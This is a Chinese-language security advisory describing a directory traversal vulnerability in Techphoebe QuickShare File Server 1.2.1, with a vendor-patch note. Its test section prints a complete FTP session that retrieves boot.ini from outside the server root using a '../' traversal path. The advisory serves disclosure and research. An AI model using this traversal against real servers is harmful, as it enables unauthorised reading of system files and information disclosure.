发布日期:2012-02-04
更新日期:2012-05-30受影响系统:
Techphoebe Techphoebe QuickShare File Server 1.2.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 46165Techphoebe QuickShare File Server是共享文件的文件服务器。Techphoebe QuickShare File Server 1.2.1在实现上存在目录穿越漏洞,攻击者可通过目录穿越字符串检索FTP服务器根目录之外的任意文件利用此漏洞造成信息泄露。<*来源:modpr0be
链接:http://www.exploit-db.com/exploits/16105/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!modpr0be@digital-echidna:~$ ftp 10.5.5.27
Connected to 10.5.5.27.
220 quickshare ftpd ready.
Name (10.5.5.27:modpr0be): ftpuser
331 User name okay, need password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get ../../../../../../../../boot.ini boot.ini
local: boot.ini remote: ../../../../../../../../boot.ini
200 PORT command successful. Consider using PASV.
150 Opening BINARY connection.
226 File send OK.
211 bytes received in 0.00 secs (127.0 kB/s)
ftp> quit
221 Goodbye.
modpr0be@digital-echidna:~$ cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
modpr0be@digital-echidna:~$# Eof建议:
--------------------------------------------------------------------------------
厂商补丁:Techphoebe
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.quicksharehq.com/Xinetd安全限制绕过漏洞Asterisk SCCP Skinny通道驱动程序拒绝服务漏洞相关资讯 目录遍历漏洞
- Oracle GlassFish Web Space (03/14/2013 15:01:43)
- PMSoftware Simple Web Server目录 (01/08/2013 08:37:45)
- EMC Data Protection Advisor目录 (12/27/2012 08:27:01)
| - Schmid Watson Management Console (01/13/2013 07:45:35)
- NetIQ Privileged User Manager (12/27/2012 17:13:16)
- CoDeSys Control服务CmbWebserver. (12/01/2012 09:28:07)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
-
|